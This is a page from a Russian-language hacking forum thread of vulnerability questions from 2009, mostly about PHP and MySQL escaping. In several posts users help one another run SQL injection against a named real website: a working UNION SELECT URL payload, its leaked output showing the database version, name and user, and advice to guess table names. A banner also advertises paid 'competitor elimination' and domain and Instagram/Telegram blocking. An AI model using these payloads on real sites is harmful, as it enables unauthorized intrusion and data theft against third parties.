Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 526 из 1393

526

Опции темы

Поиск в этой теме

Опции просмотра

#5251

01.02.2009, 03:15

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Цитата:

там макс что можно, это прочитать файлы..

я откуда знаю что там вобще) я думал есть возможность заливать ) увЫ

#5252

01.02.2009, 04:56

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

Цитата:

Сообщение от [Raz0r]

Используй mysql_(real_)*escape_string()

тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то

Цитата:

mysql_real_escape_string() вызывает библиотечную функцмю MySQL mysql_real_escape_string, которая добавляет обратную косую черту к следующим символам: \x00, \n, \r, \, ', " and \x1a.

то есть например

$sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1";
все равно уязвим.

Последний раз редактировалось AkyHa_MaTaTa; 01.02.2009 в 19:53..

#5253

01.02.2009, 10:04

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\

#5254

01.02.2009, 13:12

AHMED HASSAN

Новичок

Регистрация: 25.04.2007

Сообщений: 16

Провел на форуме:
110445

Репутация: 1

hi

sorry for my language

what to do with this

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/store/ancillary.asp, line 17

thanx

#5255

01.02.2009, 13:27

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от procedure

./docs/danger\0/body.html
- от такая хня получается(

Нулл байт экранируется, включена маджик квот.

AHMED HASSAN Официальный язык форума Русский, будь добр, пользуйся онлайн переводчиками (хотя-бы), или задавай вопросы в английском разделе.

Official language a forum Russian, if you please, use online translators , or ask questions in English section.

По поводу вопроса: это Access
http://forum.antichat.ru/thread50550.html

#5256

01.02.2009, 14:51

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

Цитата:

Сообщение от mailbrush

159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\

даже если имеется возможность назначить собственное значение для $str, это никак не позволит выполнить код в file_get_contents(), как было предложено тобой.

Цитата:

тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без скобок

@AkyHa_MaTaTa
без кавычек

__________________
<? Raz0r.name — блог о web-безопасности

#5257

01.02.2009, 18:47

kevmen

Участник форума

Регистрация: 29.10.2008

Сообщений: 165

Провел на форуме:
397889

Репутация: 60

Отправить сообщение для kevmen с помощью ICQ

PHP код:


		
			
http://www.sterlitamak.ru/arxnews.shtml?id=-873+

union+select+1,version(),3,4,5,6,7,8,9,0

подскажите с дальнейшими действиями,я запутался!Каким образом можно узнать полный путь к файлу arxnews.shtml
Хоть что-нибудь подскажите,пожалуйста!

#5258

01.02.2009, 19:01

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Цитата:

Сообщение от kevmen

PHP код:


		
			
http://www.sterlitamak.ru/arxnews.shtml?id=-873+

union+select+1,version(),3,4,5,6,7,8,9,0

Цитата:

http://www.sterlitamak.ru/arxnews.shtml?id=-873+union+select+1,concat(version(),0x3a,DATABASE( ),0x3a,USER()),3,4,5,6,7,8,9,10/*

4.0.24_Debian-10sarge2-log:admstr:adminstr@localhost

А дальше таблици подбирай - ...9,10+from+имятаблици/*

#5259

01.02.2009, 19:10

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от kevmen

PHP код:


		
			
http://www.sterlitamak.ru/arxnews.shtml?id=-873+

union+select+1,version(),3,4,5,6,7,8,9,0

а зачеим тебе путь? там лоад файл запрещен

#5260

01.02.2009, 20:20

kevmen

Участник форума

Регистрация: 29.10.2008

Сообщений: 165

Провел на форуме:
397889

Репутация: 60

только подбирать названия?Ничего другого нельзя сделать?
То есть нужно надеятся на удачу?или есть какой-нибудь другой способ

Страница 526 из 1393

526

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход